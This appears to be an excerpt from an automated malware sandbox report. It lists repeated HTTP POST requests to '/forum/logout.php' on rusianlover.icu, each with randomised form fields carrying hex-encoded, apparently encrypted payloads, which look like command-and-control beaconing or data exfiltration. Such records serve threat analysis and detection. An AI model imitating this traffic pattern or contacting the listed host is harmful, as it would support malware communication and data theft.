                      Source: global trafficHTTP traffic detected: POST /forum/logout.php?page=83 HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: rusianlover.icuContent-Length: 644Cache-Control: no-cacheData Raw: 76 77 78 79 74 75 76 77 72 3d 36 39 31 36 36 35 37 31 26 78 61 64 67 64 3d 36 64 36 37 64 32 36 36 33 37 34 35 61 32 63 63 32 37 32 64 31 35 65 65 31 38 26 7a 65 6a 6f 6e 73 78 3d 32 46 31 30 30 35 38 32 35 39 34 32 34 42 32 34 39 39 35 33 42 39 32 41 32 45 38 31 32 33 34 41 43 33 45 33 41 35 33 35 42 37 32 42 39 44 46 43 39 32 39 45 42 44 38 33 43 45 46 38 36 44 34 39 32 31 38 36 45 45 41 44 41 41 34 36 33 43 31 46 31 37 36 32 37 46 39 32 34 35 37 42 31 42 43 34 34 46 42 45 33 44 30 30 43 33 41 41 30 30 42 31 46 42 44 41 39 35 44 46 34 31 35 39 38 41 46 32 33 39 38 46 42 43 37 45 42 32 36 33 42 33 39 43 32 39 34 38 37 43 34 45 30 46 43 31 34 33 32 44 34 34 44 45 45 43 37 34 30 43 36 39 32 33 46 46 36 45 41 44 33 44 34 30 44 39 31 44 43 35 38 43 36 38 44 31 36 42 42 43 36 46 32 36 36 42 37 39 43 43 43 32 35 31 45 37 43 41 35 42 30 43 39 38 33 34 34 30 43 31 31 34 32 33 30 33 32 43 46 34 33 36 42 46 38 38 37 35 32 38 37 33 30 46 46 32 31 41 42 37 45 39 32 38 43 43 42 34 38 44 46 45 32 46 41 33 45 42 36 34 34 33 37 34 36 30 38 32 45 35 39 35 31 33 42 32 34 43 42 43 33 30 43 32 41 32 46 33 30 31 44 36 46 31 32 32 44 41 32 41 30 39 41 38 34 35 33 36 30 30 36 36 42 33 41 39 32 34 32 34 42 33 34 33 39 34 36 46 44 38 46 44 42 36 46 35 37 30 31 35 44 31 42 32 35 38 46 43 41 44 39 37 36 33 42 46 36 34 39 38 33 35 35 33 32 34 35 45 36 31 35 41 43 31 32 33 38 38 31 30 30 44 46 43 45 39 33 38 44 34 38 31 32 46 42 31 45 34 39 42 31 36 46 43 34 44 43 34 41 41 46 43 46 34 34 37 46 39 43 42 35 38 36 30 42 42 41 46 43 38 35 42 32 32 41 32 43 30 32 36 43 31 31 41 38 30 36 34 43 32 42 32 32 32 38 45 30 34 34 45 36 37 41 31 30 39 45 31 41 37 30 37 39 39 35 45 36 38 38 36 41 44 38 39 36 31 38 43 39 34 36 32 30 42 39 39 35 34 30 43 43 34 31 41 32 37 44 42 41 45 32 30 44 42 43 38 33 34 37 36 34 36 36 42 45 30 42 32 44 32 46 30 31 39 34 33 30 46 34 31 46 42 31 45 41 36 46 33 33 35 43 38 46 32 39 30 44 37 45 43 39 36 39 45 Data Ascii: vwxytuvwr=69166571&xadgd=6d67d2663745a2cc272d15ee18&zejonsx=2F10058259424B249953B92A2E81234AC3E3A535B72B9DFC929EBD83CEF86D492186EEADAA463C1F17627F92457B1BC44FBE3D00C3AA00B1FBDA95DF41598AF2398FBC7EB263B39C29487C4E0FC1432D44DEEC740C6923FF6EAD3D40D91DC58C68D16BBC6F266B79CCC251E7CA5B0C983440C11423032CF436BF887528730FF21AB7E928CCB48DFE2FA3EB6443746082E59513B24CBC30C2A2F301D6F122DA2A09A845360066B3A92424B343946FD8FDB6F57015D1B258FCAD9763BF64983553245E615AC12388100DFCE938D4812FB1E49B16FC4DC4AAFCF447F9CB5860BBAFC85B22A2C026C11A8064C2B2228E044E67A109E1A707995E6886AD89618C94620B99540CC41A27DBAE20DBC83476466BE0B2D2F019430F41FB1EA6F335C8F290D7EC969E
                      Source: global trafficHTTP traffic detected: POST /forum/logout.php?id=2140088 HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: rusianlover.icuContent-Length: 679Cache-Control: no-cacheData Raw: 6f 69 63 77 71 6b 3d 32 39 34 33 35 31 36 32 26 71 6d 69 65 61 77 73 69 3d 35 33 65 39 36 35 66 38 32 33 38 36 66 64 34 38 66 38 30 35 35 33 63 31 65 31 30 66 36 64 38 65 31 35 37 37 65 36 31 32 30 64 36 39 31 35 61 32 31 39 36 66 63 31 66 32 38 66 32 61 33 38 38 64 26 73 71 6f 6d 3d 41 44 41 32 46 44 34 36 34 38 43 43 36 36 46 37 33 36 45 45 42 42 42 42 33 35 30 35 32 31 36 39 31 31 34 31 43 37 43 39 44 44 35 38 46 38 44 30 31 42 43 39 37 32 30 46 33 37 46 30 30 44 42 30 41 39 42 30 44 38 37 41 36 45 44 38 46 41 37 44 39 30 39 41 35 31 39 34 41 31 36 33 32 33 31 42 33 35 46 35 43 41 46 31 37 35 30 45 31 31 36 41 41 39 42 43 44 32 35 37 36 41 31 34 42 39 32 36 44 32 46 46 36 36 44 42 35 35 38 44 30 41 36 39 33 43 43 35 39 39 30 42 35 41 39 36 32 32 34 45 46 31 34 43 42 39 38 31 33 37 31 30 38 37 30 39 33 33 42 30 38 33 43 44 42 39 32 46 30 32 43 39 44 41 35 43 34 32 42 32 43 46 39 45 30 39 44 33 36 35 34 42 43 35 44 41 42 39 41 34 32 37 41 37 36 35 44 45 43 46 45 42 33 39 42 33 41 34 37 31 45 42 32 38 37 38 30 34 33 33 38 31 31 33 31 36 43 32 34 46 44 42 35 34 42 32 46 38 38 46 45 35 33 31 33 42 35 45 41 30 37 36 45 35 44 41 44 41 38 38 39 33 39 31 45 35 46 34 35 31 30 35 37 45 43 44 38 33 38 31 38 32 39 46 34 41 35 45 35 33 38 39 32 45 30 35 38 37 37 46 32 31 32 37 41 36 32 33 46 43 38 42 45 38 30 43 34 41 43 37 35 45 35 32 33 36 38 42 42 44 31 30 41 34 31 35 31 34 37 42 36 35 38 35 31 41 38 43 38 30 33 42 34 35 41 43 37 30 31 32 34 42 32 32 39 37 32 34 35 35 43 37 38 43 34 36 44 43 45 32 31 34 39 39 33 31 31 46 45 44 38 45 36 38 33 31 35 33 42 44 41 33 38 34 30 41 44 41 44 46 33 38 33 39 34 45 42 35 37 32 36 33 37 36 46 38 45 30 33 46 30 32 46 38 36 43 35 38 46 36 35 39 33 39 31 46 43 39 31 34 39 44 39 38 41 34 38 41 33 42 31 38 43 35 39 32 45 36 44 46 44 36 42 36 38 45 43 38 36 35 36 37 34 46 45 44 38 31 46 32 39 41 36 34 37 46 38 33 43 30 36 34 42 42 34 33 34 44 37 31 32 42 35 32 33 34 33 34 42 36 32 35 39 46 34 46 45 36 35 36 41 30 44 37 33 30 30 45 36 30 37 39 41 31 36 45 36 35 38 32 39 43 46 37 Data Ascii: oicwqk=29435162&qmieawsi=53e965f82386fd48f80553c1e10f6d8e1577e6120d6915a2196fc1f28f2a388d&sqom=ADA2FD4648CC66F736EEBBBB350521691141C7C9DD58F8D01BC9720F37F00DB0A9B0D87A6ED8FA7D909A5194A163231B35F5CAF1750E116AA9BCD2576A14B926D2FF66DB558D0A693CC5990B5A96224EF14CB9813710870933B083CDB92F02C9DA5C42B2CF9E09D3654BC5DAB9A427A765DECFEB39B3A471EB28780433811316C24FDB54B2F88FE5313B5EA076E5DADA889391E5F451057ECD8381829F4A5E53892E05877F2127A623FC8BE80C4AC75E52368BBD10A415147B65851A8C803B45AC70124B22972455C78C46DCE21499311FED8E683153BDA3840ADADF38394EB5726376F8E03F02F86C58F659391FC9149D98A48A3B18C592E6DFD6B68EC865674FED81F29A647F83C064BB434D712B523434B6259F4FE656A0D7300E6079A16E65829CF7
                      Source: global trafficHTTP traffic detected: POST /forum/logout.php?id=9885598 HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: rusianlover.icuContent-Length: 646Cache-Control: no-cacheData Raw: 7a 65 6a 6f 74 3d 35 39 39 37 35 34 38 35 26 62 69 70 77 64 6b 72 3d 43 45 33 42 36 34 37 42 32 45 41 35 41 36 31 43 31 31 37 31 46 30 32 44 39 37 34 32 26 64 6d 76 65 6e 77 66 6f 78 3d 35 46 33 30 41 46 45 41 30 39 43 44 38 33 42 38 43 32 44 35 34 38 45 30 35 38 31 39 46 45 43 44 33 37 41 34 33 30 38 43 43 36 42 30 43 34 42 39 36 44 45 32 31 38 30 45 38 35 34 32 45 45 35 31 43 30 39 46 46 32 37 44 45 46 37 30 36 32 45 34 43 44 30 37 43 36 33 45 45 33 46 37 39 35 46 38 37 37 33 42 35 35 37 41 45 42 38 39 46 33 46 46 41 38 44 36 37 44 31 42 46 43 36 32 36 37 33 44 30 33 37 39 46 36 42 37 38 34 34 33 43 35 41 31 46 46 30 44 30 34 37 36 35 34 36 43 41 35 30 37 46 33 43 41 44 37 36 33 35 46 45 35 37 43 41 35 43 45 39 37 38 46 42 41 30 37 36 30 45 37 45 38 42 41 42 36 32 43 35 39 42 32 37 45 33 44 36 45 37 41 36 38 42 41 39 45 38 34 37 42 35 42 32 30 42 37 43 41 44 36 37 45 39 41 35 43 44 45 35 45 37 37 35 43 45 39 35 45 34 39 46 46 36 39 31 35 36 30 46 31 38 38 46 44 30 35 45 32 35 42 44 42 35 39 37 32 33 41 36 35 34 41 33 32 30 44 41 39 42 39 37 41 42 30 44 34 43 35 35 45 36 43 32 34 31 38 33 42 41 36 33 36 36 45 44 42 39 30 44 46 41 38 39 41 31 45 32 44 37 35 32 33 30 36 38 46 30 32 41 32 46 37 37 42 31 43 33 35 39 45 31 33 37 32 34 36 42 41 30 36 35 32 34 46 46 37 46 34 44 44 39 36 44 32 45 44 43 41 33 43 37 32 30 43 41 37 43 32 32 46 30 46 34 44 46 33 45 35 44 37 35 32 37 45 44 30 34 41 39 33 33 31 42 44 44 34 31 44 31 36 30 45 39 36 45 32 33 44 35 34 45 46 37 32 43 36 43 46 38 44 38 33 37 45 32 43 31 46 30 44 33 32 35 36 42 30 35 41 45 31 45 41 34 32 42 37 44 44 30 46 34 34 38 30 41 36 41 38 42 46 41 32 36 39 31 43 33 44 31 38 44 38 34 36 31 46 32 36 38 33 37 31 32 46 45 35 42 37 46 32 32 36 37 35 45 38 38 43 45 30 33 34 36 43 41 35 42 31 36 34 37 35 38 34 35 36 35 43 44 33 34 33 42 32 35 45 30 44 38 31 41 45 46 33 34 34 42 31 31 43 43 32 43 44 43 35 42 42 32 32 43 42 41 31 42 41 38 35 36 44 35 37 32 35 Data Ascii: zejot=59975485&bipwdkr=CE3B647B2EA5A61C1171F02D9742&dmvenwfox=5F30AFEA09CD83B8C2D548E05819FECD37A4308CC6B0C4B96DE2180E8542EE51C09FF27DEF7062E4CD07C63EE3F795F8773B557AEB89F3FFA8D67D1BFC62673D0379F6B78443C5A1FF0D0476546CA507F3CAD7635FE57CA5CE978FBA0760E7E8BAB62C59B27E3D6E7A68BA9E847B5B20B7CAD67E9A5CDE5E775CE95E49FF691560F188FD05E25BDB59723A654A320DA9B97AB0D4C55E6C24183BA6366EDB90DFA89A1E2D7523068F02A2F77B1C359E137246BA06524FF7F4DD96D2EDCA3C720CA7C22F0F4DF3E5D7527ED04A9331BDD41D160E96E23D54EF72C6CF8D837E2C1F0D3256B05AE1EA42B7DD0F4480A6A8BFA2691C3D18D8461F2683712FE5B7F22675E88CE0346CA5B1647584565CD343B25E0D81AEF344B11CC2CDC5BB22CBA1BA856D5725
                      Source: global trafficHTTP traffic detected: POST /forum/logout.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: rusianlover.icuContent-Length: 692Cache-Control: no-cacheData Raw: 78 61 64 61 64 67 6a 3d 45 38 33 30 42 44 43 36 43 34 46 37 36 46 33 35 42 35 45 33 39 45 33 31 38 41 37 38 45 32 31 30 32 37 41 30 38 35 31 31 41 35 30 35 42 30 31 34 42 41 34 42 33 45 33 43 36 37 37 46 36 46 36 45 33 46 45 45 30 44 46 32 35 33 26 76 77 78 73 74 3d 36 39 30 34 36 34 34 31 26 7a 65 6a 69 6e 73 78 77 62 3d 30 38 63 30 66 39 37 33 32 65 64 65 63 37 37 64 30 33 64 63 64 65 39 30 65 36 63 38 34 32 35 34 36 35 34 63 37 31 31 35 33 62 63 62 30 39 33 62 30 63 62 63 62 63 39 30 62 36 35 65 62 63 32 35 33 62 34 38 65 37 63 66 63 36 37 63 63 38 31 34 36 32 37 31 32 36 32 37 30 36 35 36 66 36 37 36 35 34 35 62 63 30 38 34 62 32 38 35 30 31 32 35 64 31 62 38 61 39 32 61 65 63 65 39 65 66 39 62 39 35 38 36 34 64 32 66 61 65 33 31 39 64 64 33 62 39 38 36 61 65 32 35 33 33 31 33 31 61 65 34 61 34 64 34 33 39 35 36 33 32 36 32 66 64 66 35 32 64 31 66 61 62 65 65 31 61 31 61 34 33 31 61 66 66 31 35 35 61 38 34 63 35 34 31 33 35 31 37 38 64 61 61 39 37 39 37 31 66 33 33 36 39 62 64 34 33 65 32 33 63 31 31 34 65 61 33 34 39 37 36 37 64 39 66 61 38 30 64 38 34 37 31 66 63 61 32 35 62 65 66 33 65 61 36 39 36 39 66 62 37 37 38 63 66 39 66 39 31 38 35 31 63 32 38 36 66 38 64 33 33 39 38 30 37 38 30 31 65 63 35 34 35 31 35 63 32 61 31 61 35 36 34 32 31 39 36 62 33 63 63 36 64 36 38 36 38 33 33 34 30 39 36 66 37 32 61 35 32 39 33 33 31 62 31 30 36 61 31 39 33 62 64 30 63 64 66 39 61 36 33 30 66 61 31 64 35 36 34 39 37 65 63 64 35 37 36 36 36 64 37 65 64 31 30 65 63 61 33 64 35 36 61 38 39 63 33 39 66 63 62 37 66 36 32 61 34 32 32 33 31 63 31 33 62 31 31 66 61 32 31 63 39 62 64 36 38 34 36 34 31 33 34 34 33 30 64 63 62 37 38 34 32 64 37 64 37 37 63 35 38 34 32 62 35 66 33 39 63 35 39 39 38 36 62 34 35 62 63 34 37 62 31 61 63 38 33 61 34 34 33 63 32 64 30 33 31 38 62 65 37 63 63 38 62 31 30 31 34 64 34 31 66 37 34 33 31 39 63 36 38 66 35 61 30 30 33 65 34 64 64 32 39 30 33 36 33 66 37 33 32 63 33 36 66 63 66 66 64 36 35 32 34 33 34 65 66 63 30 30 63 36 37 37 33 32 39 63 37 64 65 36 64 39 34 31 37 64 32 36 33 64 37 34 33 65 64 39 62 30 62 38 61 35 32 Data Ascii: xadadgj=E830BDC6C4F76F35B5E39E318A78E21027A08511A505B014BA4B3E3C677F6F6E3FEE0DF253&vwxst=69046441&zejinsxwb=08c0f9732edec77d03dcde90e6c84254654c71153bcb093b0cbcbc90b65ebc253b48e7cfc67cc814627126270656f676545bc084b2850125d1b8a92aece9ef9b95864d2fae319dd3b986ae2533131ae4a4d439563262fdf52d1fabee1a1a431aff155a84c54135178daa97971f3369bd43e23c114ea349767d9fa80d8471fca25bef3ea6969fb778cf9f91851c286f8d339807801ec54515c2a1a5642196b3cc6d6868334096f72a529331b106a193bd0cdf9a630fa1d56497ecd57666d7ed10eca3d56a89c39fcb7f62a42231c13b11fa21c9bd68464134430dcb7842d7d77c5842b5f39c59986b45bc47b1ac83a443c2d0318be7cc8b1014d41f74319c68f5a003e4dd290363f732c36fcffd652434efc00c677329c7
                      Source: global trafficHTTP traffic detected: POST /forum/logout.php?page=1 HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: rusianlover.icuContent-Length: 635Cache-Control: no-cacheData Raw: 73 71 6f 6d 6b 69 61 79 3d 37 32 36 63 39 34 31 65 32 34 35 64 65 39 36 36 64 38 64 65 26 71 6d 69 65 61 77 3d 34 37 33 36 33 31 33 38 26 75 75 75 75 3d 32 36 36 44 44 30 36 43 42 37 42 36 39 43 38 35 43 31 32 34 41 33 31 33 38 30 34 32 38 31 46 35 45 45 31 46 39 36 35 46 32 37 42 46 37 44 46 45 31 39 38 37 35 37 43 42 43 36 43 46 38 45 34 33 41 46 41 41 36 38 34 43 35 41 43 46 30 38 44 35 36 34 37 31 31 35 36 46 39 38 30 38 46 46 36 39 33 30 43 42 39 32 43 36 31 37 45 39 30 33 30 42 31 36 42 31 41 41 45 43 33 33 31 37 30 33 35 32 37 33 33 31 36 38 37 44 31 42 42 35 31 39 35 30 44 33 44 36 37 37 37 32 35 45 32 34 30 36 33 32 34 45 46 37 42 37 38 46 46 34 41 35 32 37 41 38 37 45 42 46 39 44 46 45 35 30 35 39 46 42 33 35 34 38 32 44 39 30 30 31 35 41 32 35 39 41 31 36 38 35 36 37 43 38 32 45 38 35 42 43 32 41 36 37 30 44 46 32 45 46 39 39 31 31 45 36 41 41 45 33 37 37 30 30 31 42 33 35 34 30 41 39 46 38 35 45 38 30 36 37 43 31 42 45 41 31 32 30 34 38 45 35 32 39 45 41 41 46 35 41 46 42 34 35 33 30 42 35 32 32 45 31 33 44 30 35 45 43 39 46 32 36 33 34 41 30 44 38 34 30 38 31 41 39 34 46 42 42 42 39 44 32 41 35 30 32 41 41 37 44 30 41 35 34 32 41 32 32 37 30 34 35 43 46 35 39 46 45 37 38 35 46 36 30 34 39 46 45 41 38 46 34 35 36 38 31 30 38 34 32 30 43 36 33 38 43 35 42 31 44 42 45 42 33 34 46 35 31 46 33 41 37 31 35 44 35 35 33 31 42 38 30 45 45 45 35 45 37 35 30 46 35 41 33 32 37 30 44 32 45 44 34 30 38 42 30 31 34 39 43 30 45 32 46 37 38 31 30 43 34 39 30 30 42 35 43 45 39 30 33 45 37 42 44 43 32 36 41 39 35 30 33 32 32 37 41 46 33 33 41 38 34 38 38 41 41 35 37 36 32 34 42 42 33 46 34 30 45 45 42 43 30 34 34 35 44 41 45 33 32 46 41 36 38 33 39 41 42 34 44 39 35 46 44 43 34 34 44 37 45 34 44 44 43 43 45 32 34 41 46 33 41 33 41 43 33 37 44 46 42 34 30 42 36 33 36 39 43 32 33 35 41 39 46 37 39 38 35 43 31 41 32 43 32 35 39 38 32 41 30 32 42 38 44 41 41 36 34 43 43 32 31 41 31 Data Ascii: sqomkiay=726c941e245de966d8de&qmieaw=47363138&uuuu=266DD06CB7B69C85C124A313804281F5EE1F965F27BF7DFE198757CBC6CF8E43AFAA684C5ACF08D56471156F9808FF6930CB92C617E9030B16B1AAEC331703527331687D1BB51950D3D677725E2406324EF7B78FF4A527A87EBF9DFE5059FB35482D90015A259A168567C82E85BC2A670DF2EF9911E6AAE377001B3540A9F85E8067C1BEA12048E529EAAF5AFB4530B522E13D05EC9F2634A0D84081A94FBBB9D2A502AA7D0A542A227045CF59FE785F6049FEA8F4568108420C638C5B1DBEB34F51F3A715D5531B80EEE5E750F5A3270D2ED408B0149C0E2F7810C4900B5CE903E7BDC26A9503227AF33A8488AA57624BB3F40EEBC0445DAE32FA6839AB4D95FDC44D7E4DDCCE24AF3A3AC37DFB40B6369C235A9F7985C1A2C25982A02B8DAA64CC21A1
                      Source: global trafficHTTP traffic detected: POST /forum/logout.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: rusianlover.icuContent-Length: 649Cache-Control: no-cacheData Raw: 6f 63 71 65 73 67 75 69 3d 44 38 31 32 42 33 42 30 45 41 33 33 45 45 43 30 46 38 33 32 34 31 46 45 41 45 38 42 31 32 41 37 36 37 26 6d 79 6b 77 69 75 3d 35 35 33 32 30 31 31 36 26 71 67 77 6d 3d 34 44 31 42 43 33 36 35 36 35 39 38 30 42 32 43 34 41 31 45 38 42 35 46 43 30 36 44 45 43 32 41 46 38 41 38 38 33 37 36 43 30 41 43 31 39 38 34 34 43 44 38 41 43 37 33 38 37 34 43 44 41 32 34 31 44 35 34 34 33 34 38 33 37 33 35 44 31 46 37 34 30 33 31 30 32 35 45 41 39 30 44 38 37 33 37 46 35 38 35 41 31 35 30 43 35 34 34 46 42 31 43 33 38 35 36 30 36 43 42 45 34 32 43 46 43 46 32 39 38 33 39 32 46 38 44 42 43 37 30 43 37 37 31 38 36 35 36 45 36 41 41 32 44 45 34 41 44 30 46 41 30 33 45 31 30 31 35 36 32 34 43 37 31 46 33 41 32 44 34 39 30 43 32 36 42 43 39 39 46 39 31 42 32 43 39 32 37 43 43 33 38 39 46 30 39 35 43 44 35 34 38 37 33 34 36 38 42 39 42 37 45 41 33 30 36 44 39 39 36 36 39 37 30 43 30 37 32 41 38 35 45 39 32 41 34 38 33 36 43 33 30 39 41 42 45 43 45 41 38 38 44 44 45 41 46 37 30 37 46 38 41 33 38 34 43 33 44 36 30 45 31 35 37 43 35 31 39 34 38 32 35 38 30 37 37 33 41 32 38 37 31 34 33 39 32 38 42 32 35 31 44 39 46 34 39 35 34 35 36 44 39 32 31 30 46 36 30 39 32 37 42 36 45 46 43 34 38 36 45 33 42 37 38 31 46 41 41 42 33 32 34 46 42 45 41 46 31 46 32 33 31 46 30 33 37 43 33 34 33 31 46 41 36 36 36 39 44 45 46 31 46 42 31 41 32 41 30 36 46 35 36 37 38 44 41 36 44 44 36 41 31 42 31 41 34 36 33 43 37 37 38 43 44 38 46 44 33 34 30 42 43 44 37 33 41 39 43 35 32 44 41 36 37 34 35 44 30 35 31 38 35 45 38 34 38 33 46 30 36 41 41 36 32 44 36 41 37 30 45 43 31 45 39 30 41 43 33 44 35 31 45 41 32 31 44 44 41 31 46 30 41 33 33 31 45 44 41 36 39 33 38 38 42 39 38 44 31 31 45 42 37 41 37 44 43 44 30 30 37 42 37 35 34 36 42 45 45 34 39 45 45 41 35 33 34 39 38 44 45 31 45 45 34 39 32 36 46 41 35 43 43 38 43 46 37 39 44 31 30 39 44 38 42 39 36 33 33 34 38 35 37 32 45 42 30 30 43 32 30 37 42 33 34 42 44 38 37 34 42 37 35 36 37 Data Ascii: ocqesgui=D812B3B0EA33EEC0F83241FEAE8B12A767&mykwiu=55320116&qgwm=4D1BC36565980B2C4A1E8B5FC06DEC2AF8A88376C0AC19844CD8AC73874CDA241D5443483735D1F74031025EA90D8737F585A150C544FB1C385606CBE42CFCF298392F8DBC70C7718656E6AA2DE4AD0FA03E1015624C71F3A2D490C26BC99F91B2C927CC389F095CD54873468B9B7EA306D9966970C072A85E92A4836C309ABECEA88DDEAF707F8A384C3D60E157C519482580773A287143928B251D9F495456D9210F60927B6EFC486E3B781FAAB324FBEAF1F231F037C3431FA6669DEF1FB1A2A06F5678DA6DD6A1B1A463C778CD8FD340BCD73A9C52DA6745D05185E8483F06AA62D6A70EC1E90AC3D51EA21DDA1F0A331EDA69388B98D11EB7A7DCD007B7546BEE49EEA53498DE1EE4926FA5CC8CF79D109D8B963348572EB00C207B34BD874B7567
                      Source: global trafficHTTP traffic detected: POST /forum/logout.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: rusianlover.icuContent-Length: 671Cache-Control: no-cacheData Raw: 73 6b 69 61 3d 32 34 44 46 46 32 37 35 37 46 43 35 45 32 34 38 32 43 36 32 42 36 36 45 39 46 32 44 33 45 44 36 37 30 34 43 38 39 31 45 32 30 33 46 45 41 37 44 46 46 42 30 42 38 36 32 26 71 67 63 73 69 65 75 71 3d 31 39 33 33 34 33 35 36 26 75 6f 6f 69 63 63 3d 33 45 36 37 38 39 37 46 42 31 45 39 43 45 32 31 34 41 41 36 37 32 41 32 31 42 35 38 35 41 34 42 39 32 34 37 33 37 34 31 37 34 46 44 34 38 45 32 32 34 44 45 31 33 30 38 37 44 41 33 44 44 32 45 45 39 35 43 41 41 35 42 44 31 37 30 43 39 32 31 39 37 42 32 30 31 41 38 34 43 41 36 44 36 31 42 45 45 31 36 45 38 43 46 33 44 39 42 33 34 46 35 35 45 34 43 37 34 38 43 45 42 41 43 37 39 34 34 34 38 43 46 45 44 39 33 43 39 35 30 42 32 36 34 32 39 46 36 39 43 41 38 39 36 46 44 36 35 35 42 38 37 30 44 32 37 42 38 32 35 34 38 41 32 46 44 34 44 37 44 44 32 32 33 35 34 39 32 37 36 37 36 42 45 43 32 41 30 36 30 37 39 46 32 38 42 44 33 32 45 32 39 44 33 34 44 35 31 32 34 43 37 46 34 42 38 37 38 45 32 45 32 35 35 35 33 38 41 38 32 45 45 33 39 39 41 32 44 46 44 38 31 36 46 46 39 42 38 35 31 31 43 35 30 34 45 36 46 39 30 34 33 33 45 31 36 38 41 34 43 36 34 42 31 32 45 44 45 44 45 31 32 32 31 41 46 39 34 41 42 35 41 43 43 36 41 30 45 32 33 32 36 43 34 31 37 37 32 39 43 37 34 38 39 32 36 32 39 35 41 41 43 45 41 34 46 46 34 43 32 46 38 39 36 43 30 39 32 38 45 43 42 38 41 44 45 41 43 34 30 39 34 46 37 45 43 43 43 31 38 35 45 37 36 38 37 39 31 37 38 45 46 45 42 37 34 35 37 45 41 45 36 34 44 41 45 37 33 33 32 33 38 33 41 44 43 34 32 34 33 34 42 32 39 46 44 35 41 32 30 37 39 41 31 33 35 38 34 34 37 35 31 43 36 31 38 36 46 43 34 45 33 37 37 34 45 34 46 34 36 44 38 46 44 41 43 41 34 33 37 41 39 33 42 43 32 36 45 44 32 45 43 37 30 44 30 39 43 45 34 36 31 45 41 38 46 45 39 45 35 42 39 34 38 43 33 32 43 30 31 43 32 41 41 43 34 37 44 46 43 43 43 31 41 33 31 45 39 44 31 34 35 39 31 38 44 46 30 39 39 46 46 41 31 46 32 44 41 42 44 35 35 31 33 38 33 31 45 38 33 38 32 41 44 36 44 39 43 42 31 36 32 32 39 37 30 31 35 42 46 36 35 44 31 41 36 35 30 32 44 30 34 32 43 Data Ascii: skia=24DFF2757FC5E2482C62B66E9F2D3ED6704C891E203FEA7DFFB0B862&qgcsieuq=19334356&uooicc=3E67897FB1E9CE214AA672A21B585A4B9247374174FD48E224DE13087DA3DD2EE95CAA5BD170C92197B201A84CA6D61BEE16E8CF3D9B34F55E4C748CEBAC794448CFED93C950B26429F69CA896FD655B870D27B82548A2FD4D7DD22354927676BEC2A06079F28BD32E29D34D5124C7F4B878E2E255538A82EE399A2DFD816FF9B8511C504E6F90433E168A4C64B12EDEDE1221AF94AB5ACC6A0E2326C417729C748926295AACEA4FF4C2F896C0928ECB8ADEAC4094F7ECCC185E76879178EFEB7457EAE64DAE7332383ADC42434B29FD5A2079A135844751C6186FC4E3774E4F46D8FDACA437A93BC26ED2EC70D09CE461EA8FE9E5B948C32C01C2AAC47DFCCC1A31E9D145918DF099FFA1F2DABD5513831E8382AD6D9CB162297015BF65D1A6502D042C
                      Source: global trafficHTTP traffic detected: POST /forum/logout.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: rusianlover.icuContent-Length: 672Cache-Control: no-cacheData Raw: 7a 65 6a 69 6e 3d 37 46 43 31 41 31 39 33 36 39 36 35 31 42 38 41 44 37 41 42 33 31 37 33 34 31 32 31 30 38 44 46 42 45 34 43 30 42 33 36 31 46 34 37 34 44 37 45 37 43 35 45 36 44 26 78 61 64 61 64 67 6a 67 6a 3d 37 39 36 34 32 34 36 39 26 62 69 70 71 78 65 6c 3d 42 38 41 38 37 39 39 39 42 46 37 44 41 43 45 43 45 36 46 39 46 34 45 36 34 44 46 42 32 34 33 35 46 34 38 37 42 43 44 32 33 34 42 30 46 30 33 46 30 30 32 36 36 31 31 33 41 31 43 32 41 34 46 41 37 36 36 38 37 45 36 33 41 42 32 44 38 30 38 45 41 30 34 43 42 38 44 42 37 30 38 45 30 42 38 42 42 33 33 31 32 38 41 37 34 33 43 38 32 34 43 41 42 39 35 34 42 37 34 36 41 35 45 42 42 39 38 44 35 43 36 36 35 41 34 35 36 46 34 33 45 34 43 43 30 39 32 33 39 34 33 36 46 32 31 42 42 37 37 37 45 33 42 42 33 39 37 43 38 42 33 41 46 34 32 35 39 43 46 35 34 43 32 33 32 43 33 43 43 36 45 39 35 45 32 36 38 46 43 46 37 30 38 44 32 34 36 34 43 37 33 34 34 30 35 33 42 39 45 46 46 42 38 34 33 41 44 34 43 38 39 44 32 41 41 34 34 38 39 30 46 32 30 41 31 32 46 35 37 46 38 30 36 36 41 43 31 41 43 45 38 38 35 44 41 39 41 41 35 38 38 33 31 36 30 31 37 30 31 43 35 38 36 35 43 30 30 30 46 34 36 44 42 45 31 39 33 33 46 38 36 44 34 34 37 36 42 33 39 36 44 43 43 34 41 37 32 43 36 35 30 44 32 44 32 36 36 39 33 46 41 33 31 32 45 38 33 44 30 30 34 44 39 34 44 36 38 42 38 32 37 31 41 38 33 45 41 32 42 39 35 37 45 34 45 38 38 31 39 32 46 30 41 39 44 37 33 34 34 34 30 31 30 46 43 37 38 36 31 44 31 42 44 42 38 39 36 36 32 31 41 35 41 42 42 41 45 38 30 32 36 34 35 44 37 32 44 35 32 41 36 42 46 39 41 37 38 43 33 37 37 42 32 38 37 35 45 31 45 37 31 34 33 32 43 45 36 45 37 39 46 42 46 43 42 35 39 33 44 32 33 44 46 31 36 30 37 35 41 38 46 43 41 45 41 38 34 36 42 35 41 33 45 41 39 38 35 44 32 43 32 46 37 41 34 45 42 37 45 35 36 35 41 33 41 46 45 46 45 46 30 36 35 36 37 32 30 35 41 31 41 39 39 42 30 31 43 30 43 42 43 43 30 46 44 43 37 43 38 36 46 46 46 32 39 37 37 45 39 37 30 45 46 43 31 42 34 33 41 30 32 32 45 37 46 45 41 45 41 31 30 31 44 42 43 30 41 33 39 45 39 41 35 43 Data Ascii: 